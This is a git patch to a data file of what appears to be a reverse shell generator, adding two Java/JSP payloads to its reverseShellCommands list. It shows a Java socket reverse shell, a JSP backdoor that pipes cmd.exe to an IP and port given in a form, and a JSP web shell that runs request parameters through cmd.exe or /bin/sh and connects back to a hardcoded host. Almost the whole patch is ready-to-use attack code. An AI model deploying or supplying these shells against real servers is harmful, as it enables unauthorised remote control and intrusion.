From dfa46c8ff1edfc65208b2a9484d374fa9ddfe105 Mon Sep 17 00:00:00 2001 From: Ryan Montgomery <44453666+0dayCTF@users.noreply.github.com> Date: Fri, 10 Mar 2023 11:17:24 -0500 Subject: [PATCH] Update data.js Added 2 Java Reverse Shells --- js/data.js | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/js/data.js b/js/data.js index 56059dc..1b05dad 100644 --- a/js/data.js +++ b/js/data.js @@ -299,6 +299,16 @@ const reverseShellCommands = withCommandType( "name": "Java #3", "command": "import java.io.InputStream;\nimport java.io.OutputStream;\nimport java.net.Socket;\n\npublic class shell {\n public static void main(String[] args) {\n String host = \"{ip}\";\n int port = {port};\n String cmd = \"{shell}\";\n try {\n Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();\n Socket s = new Socket(host, port);\n InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\n OutputStream po = p.getOutputStream(), so = s.getOutputStream();\n while (!s.isClosed()) {\n while (pi.available() > 0)\n so.write(pi.read());\n while (pe.available() > 0)\n so.write(pe.read());\n while (si.available() > 0)\n po.write(si.read());\n so.flush();\n po.flush();\n Thread.sleep(50);\n try {\n p.exitValue();\n break;\n } catch (Exception e) {}\n }\n p.destroy();\n s.close();\n } catch (Exception e) {}\n }\n}", "meta": ["windows", "linux", "mac"] + }, + { + "name": "Java #4", + "command": "<%@\r\npage import=\"java.lang.*, java.util.*, java.io.*, java.net.*\"\r\n% >\r\n<%!\r\nstatic class StreamConnector extends Thread\r\n{\r\n InputStream is;\r\n OutputStream os;\r\n StreamConnector(InputStream is, OutputStream os)\r\n {\r\n this.is = is;\r\n this.os = os;\r\n }\r\n public void run()\r\n {\r\n BufferedReader isr = null;\r\n BufferedWriter osw = null;\r\n try\r\n {\r\n isr = new BufferedReader(new InputStreamReader(is));\r\n osw = new BufferedWriter(new OutputStreamWriter(os));\r\n char buffer[] = new char[8192];\r\n int lenRead;\r\n while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)\r\n {\r\n osw.write(buffer, 0, lenRead);\r\n osw.flush();\r\n }\r\n }\r\n catch (Exception ioe)\r\n try\r\n {\r\n if(isr != null) isr.close();\r\n if(osw != null) osw.close();\r\n }\r\n catch (Exception ioe)\r\n }\r\n}\r\n%>\r\n\r\n

JSP Backdoor Reverse Shell<\/h1>\r\n\r\n
\r\nIP Address\r\n\r\nPort\r\n\r\n\r\n<\/form>\r\n

\r\n

\r\n\r\n<%\r\nString ipAddress = request.getParameter(\"ipaddress\");\r\nString ipPort = request.getParameter(\"port\");\r\nif(ipAddress != null && ipPort != null)\r\n{\r\n Socket sock = null;\r\n try\r\n {\r\n sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\r\n Runtime rt = Runtime.getRuntime();\r\n Process proc = rt.exec(\"cmd.exe\");\r\n StreamConnector outputConnector =\r\n new StreamConnector(proc.getInputStream(),\r\n sock.getOutputStream());\r\n StreamConnector inputConnector =\r\n new StreamConnector(sock.getInputStream(),\r\n proc.getOutputStream());\r\n outputConnector.start();\r\n inputConnector.start();\r\n }\r\n catch(Exception e) \r\n}\r\n%>", + "meta": ["windows", "linux", "mac"] + }, + { + "name": "Java Two Way", + "command": "<%\r\n \/*\r\n * Usage: This is a 2 way shell, one web shell and a reverse shell. First, it will try to connect to a listener (atacker machine), with the IP and Port specified at the end of the file.\r\n * If it cannot connect, an HTML will prompt and you can input commands (sh\/cmd) there and it will prompts the output in the HTML.\r\n * Note that this last functionality is slow, so the first one (reverse shell) is recommended. Each time the button \"send\" is clicked, it will try to connect to the reverse shell again (apart from executing \r\n * the command specified in the HTML form). This is to avoid to keep it simple.\r\n *\/\r\n%>\r\n\r\n<%@page import=\"java.lang.*\"%>\r\n<%@page import=\"java.io.*\"%>\r\n<%@page import=\"java.net.*\"%>\r\n<%@page import=\"java.util.*\"%>\r\n\r\n\r\n\r\n jrshell<\/title>\r\n<\/head>\r\n<body>\r\n<form METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">\r\n <input TYPE=\"text\" NAME=\"shell\">\r\n <input TYPE=\"submit\" VALUE=\"Send\">\r\n<\/form>\r\n<pre>\r\n<%\r\n \/\/ Define the OS\r\n String shellPath = null;\r\n try\r\n {\r\n if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1) {\r\n shellPath = new String(\"\/bin\/sh\");\r\n } else {\r\n shellPath = new String(\"cmd.exe\");\r\n }\r\n } catch( Exception e ){}\r\n \/\/ INNER HTML PART\r\n if (request.getParameter(\"shell\") != null) {\r\n out.println(\"Command: \" + request.getParameter(\"shell\") + \"\\n<BR>\");\r\n Process p;\r\n if (shellPath.equals(\"cmd.exe\"))\r\n p = Runtime.getRuntime().exec(\"cmd.exe \/c \" + request.getParameter(\"shell\"));\r\n else\r\n p = Runtime.getRuntime().exec(\"\/bin\/sh -c \" + request.getParameter(\"shell\"));\r\n OutputStream os = p.getOutputStream();\r\n InputStream in = p.getInputStream();\r\n DataInputStream dis = new DataInputStream(in);\r\n String disr = dis.readLine();\r\n while ( disr != null ) {\r\n out.println(disr);\r\n disr = dis.readLine();\r\n }\r\n }\r\n \/\/ TCP PORT PART\r\n class StreamConnector extends Thread\r\n {\r\n InputStream wz;\r\n OutputStream yr;\r\n StreamConnector( InputStream wz, OutputStream yr ) {\r\n this.wz = wz;\r\n this.yr = yr;\r\n }\r\n public void run()\r\n {\r\n BufferedReader r = null;\r\n BufferedWriter w = null;\r\n try\r\n {\r\n r = new BufferedReader(new InputStreamReader(wz));\r\n w = new BufferedWriter(new OutputStreamWriter(yr));\r\n char buffer[] = new char[8192];\r\n int length;\r\n while( ( length = r.read( buffer, 0, buffer.length ) ) > 0 )\r\n {\r\n w.write( buffer, 0, length );\r\n w.flush();\r\n }\r\n } catch( Exception e ){}\r\n try\r\n {\r\n if( r != null )\r\n r.close();\r\n if( w != null )\r\n w.close();\r\n } catch( Exception e ){}\r\n }\r\n }\r\n \r\n try {\r\n Socket socket = new Socket( \"192.168.119.128\", 8081 ); \/\/ Replace with wanted ip and port\r\n Process process = Runtime.getRuntime().exec( shellPath );\r\n new StreamConnector(process.getInputStream(), socket.getOutputStream()).start();\r\n new StreamConnector(socket.getInputStream(), process.getOutputStream()).start();\r\n out.println(\"port opened on \" + socket);\r\n } catch( Exception e ) {}\r\n%>\r\n<\/pre>\r\n<\/body>\r\n<\/html>", + "meta": ["windows", "linux", "mac"] }, { "name": "Javascript",